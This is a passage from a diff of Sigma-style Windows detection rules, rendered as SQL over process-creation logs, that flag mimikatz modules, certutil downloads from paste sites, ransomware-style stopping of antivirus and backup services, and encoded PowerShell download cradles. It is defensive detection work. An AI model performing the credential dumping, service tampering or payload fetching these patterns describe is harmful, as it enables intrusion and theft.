'%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - 
"title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", - "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR 
CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Suspicious File 
Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR 
CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' 
ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "PUA - AdvancedRun Execution", 
+ "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], + "description": "Detects the execution of AdvancedRun utility", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE 